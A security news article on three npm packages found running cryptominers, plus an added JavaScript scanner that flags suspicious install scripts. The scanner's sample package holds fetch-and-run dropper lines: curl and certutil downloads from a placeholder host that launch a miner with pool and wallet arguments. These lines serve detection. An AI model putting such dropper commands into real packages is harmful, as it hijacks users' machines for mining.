Malicious NPM Packages Caught Running Cryptominer on Windows, Linux, macOS Devices


Three JavaScript libraries uploaded to the official NPM package repository have been unmasked as crypto-mining malware, once again demonstrating how open-source software package repositories have become a lucrative target for staging an array of attacks on Windows, macOS, and Linux systems.

The malicious packages in question, named okhsa, klow, and klown, were published by the same developer and falsely claimed to be JavaScript-based user-agent string parsers designed to extract hardware specifics from the "User-Agent" HTTP header. But unbeknownst to the victims who imported them, the author hid cryptocurrency mining malware inside the libraries.


The threat actor's NPM account has since been deactivated, and all three libraries, which had been downloaded 112, 4, and 65 times respectively, were removed from the repository as of October 15, 2021.

Attacks involving the three libraries worked by detecting the current operating system, then running a .bat (for Windows) or .sh (for Unix-based OS) script. "These scripts then download an externally-hosted EXE or a Linux ELF, and execute the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize," Sonatype security researcher Ali ElShakankiry said.
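The install-time chain described above (branch on the host OS, drop a .bat or .sh script, fetch a remote binary, launch it with pool, wallet and thread arguments) is exactly what a dependency audit can look for in npm lifecycle scripts. The following is an added example, not code from the article, from Sonatype, or from the okhsa, klow and klown packages themselves: it scans the `preinstall`/`install`/`postinstall`/`prepare` hooks of a package, follows those commands into any script files shipped in the tarball, and flags the combination of indicators. The three sample packages, their file contents, the `example.invalid` URLs and the `--pool`/`--wallet`/`--threads` flags are all constructed stand-ins for illustration.

```javascript
'use strict';
// Added example (not code from the article, Sonatype, or the packages named
// above): a heuristic audit of npm lifecycle scripts for the install-time
// pattern described in the article: branch on the host OS, drop a .bat/.sh
// script, fetch a remote binary, and launch it with mining arguments.
// All package contents below are constructed for illustration.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each indicator is a regular expression run against the hook's command line
// and against any local file that command (transitively) references.
const INDICATORS = {
  platformBranch: /process\.platform|os\.platform\s*\(|\buname\b|%OS%/,
  shellDropper:   /\b[\w./-]+\.(?:bat|cmd|sh)\b/,
  remoteFetch:    /\b(?:curl|wget|Invoke-WebRequest|certutil)\b|https?:\/\//,
  minerArgs:      /--(?:pool|wallet|threads|donate-level)\b|stratum\+tcp:\/\//,
};

// Starting from a command line, collect every shipped file whose name appears
// in the text, then recurse into those files. This follows
// "node preinstall.js" into preinstall.js and from there into run.sh/run.bat.
function collectReachableFiles(cmd, files) {
  const queue = [cmd];
  const seen = new Set();
  const reached = [];
  while (queue.length) {
    const text = queue.shift();
    for (const name of Object.keys(files)) {
      if (!seen.has(name) && text.includes(name)) {
        seen.add(name);
        reached.push(name);
        queue.push(files[name]);
      }
    }
  }
  return reached;
}

// Audit one package given its manifest (package.json as an object) and the
// text of the files shipped in its tarball ({ relativePath: contents }).
function auditPackage(pkg) {
  const { manifest, files = {} } = pkg;
  const scripts = manifest.scripts || {};
  const findings = [];

  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    const corpus = [{ where: hook, text: cmd }];
    for (const name of collectReachableFiles(cmd, files)) {
      corpus.push({ where: `${hook} -> ${name}`, text: files[name] });
    }
    for (const { where, text } of corpus) {
      for (const [indicator, re] of Object.entries(INDICATORS)) {
        if (re.test(text)) findings.push({ hook, where, indicator });
      }
    }
  }

  // Any single indicator is common in legitimate native-addon packages; the
  // combination of OS detection, a dropped shell script and a remote fetch
  // at install time is the shape described in the article.
  const hit = new Set(findings.map((f) => f.indicator));
  const suspicious =
    hit.has('platformBranch') && hit.has('shellDropper') && hit.has('remoteFetch');
  return { name: manifest.name, findings, suspicious, indicators: [...hit].sort() };
}

// Constructed sample packages (hypothetical names and contents).
const SAMPLE_PACKAGES = [
  // Benign: no lifecycle scripts at all.
  { manifest: { name: 'left-pad-like', version: '1.0.0' }, files: {} },
  // Benign native addon: builds locally and fetches nothing.
  { manifest: { name: 'native-addon-like', version: '2.0.0',
                scripts: { install: 'node-gyp rebuild' } }, files: {} },
  // Stand-in for the pattern described above (not the real okhsa/klow/klown
  // code): preinstall branches on the OS and drops run.bat or run.sh, each of
  // which fetches a remote binary and launches it with mining arguments.
  { manifest: { name: 'ua-parser-lookalike', version: '0.0.3',
                scripts: { preinstall: 'node preinstall.js' } },
    files: {
      'preinstall.js': [
        "const { execSync } = require('child_process');",
        "if (process.platform === 'win32') execSync('run.bat');",
        "else execSync('sh run.sh');",
      ].join('\n'),
      'run.sh': [
        'curl -s -o /tmp/.x https://example.invalid/miner-linux',
        'chmod +x /tmp/.x',
        '/tmp/.x --pool stratum+tcp://example.invalid:3333 --wallet WALLET --threads 4 &',
      ].join('\n'),
      'run.bat': [
        'certutil -urlcache -split -f https://example.invalid/miner.exe %TEMP%\\x.exe',
        'start /B %TEMP%\\x.exe --pool stratum+tcp://example.invalid:3333 --wallet WALLET --threads 4',
      ].join('\n'),
    } },
];

function runAudit(packages = SAMPLE_PACKAGES) {
  return packages.map(auditPackage);
}

for (const r of runAudit()) {
  console.log(`${r.name}: ${r.suspicious ? 'SUSPICIOUS' : 'ok'} [${r.indicators.join(', ')}]`);
}
```

The indicators are deliberately loose and only their conjunction is treated as suspicious, because a lone `process.platform` check or a lone `curl` in a `postinstall` hook is routine for packages that build or download native components. Independently of any scanner, lifecycle scripts of this kind never run when npm is invoked with `--ignore-scripts` (or with `ignore-scripts=true` set in `.npmrc`), which is the simplest control against this class of install-time payload.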


This is far from the first time brandjacking, typosquatting, and cryptomining malware have been found lurking in software repositories.


Earlier this June, Sonatype and JFrog (formerly Vdoo) identified malicious packages infiltrating the PyPI repository that secretly deployed crypto-miners on the affected machines. That is not counting copycat packages named after repositories or components used internally by high-profile tech companies in what is known as dependency confusion.
